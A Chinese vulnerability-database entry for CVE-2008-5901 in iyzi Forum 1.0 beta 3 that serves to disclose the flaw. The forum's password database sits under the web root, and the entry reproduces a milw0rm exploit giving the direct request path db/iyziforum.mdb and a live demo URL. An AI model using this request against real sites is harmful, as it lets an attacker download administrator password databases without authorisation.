iyzi Forum管理员密码文件泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117036 漏洞类型 权限许可和访问控制
发布时间 2008-12-14 更新时间 2009-01-12
CVE编号 CVE-2008-5901 CNNVD-ID CNNVD-200901-121
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7449
https://www.securityfocus.com/bid/84608
https://cxsecurity.com/issue/WLB-2009010161
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-121
|漏洞详情
iyziForum1.0beta3在web根下储存敏感信息而未赋予足够的访问控制,这使得远程攻击者可以借助一个对db/iyziforum.mdb的直接请求,下载包含密码的数据库文件。
|漏洞EXP
####################################################################################################
# iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability                                  #
# © Ghost Hacker - REAL-H.COM                                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : http://Real-h.com                                                                  #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Name Script : iyzi Forum                                                                      #
#[~] Download : http://www.iyziforum.com/                                                          #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/db/iyziforum.mdb                                                          #
#[~]Live Demo     &nb sp;                                                                          #
# http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb                              #
####################################################################################################
#[~]Greets :                                                                                       #
# Mr.SaFa7 [v4-team.com] , AlpHaNiX , Qabandi                                                      #
# All Members Real-h.com and v4-team.net , All My Friends                                          #
####################################################################################################

# milw0rm.com [2008-12-14]
|受影响的产品
Iyziforum Iyzi Forum 1.0 Beta 3
|参考资料

来源:XF
名称:iyziforum-iyziforum-info-disclosure(47330)
链接:http://xforce.iss.net/xforce/xfdb/47330
来源:MILW0RM
名称:7449
链接:http://www.milw0rm.com/exploits/7449
来源:SREASON
名称:4908
链接:http://securityreason.com/securityalert/4908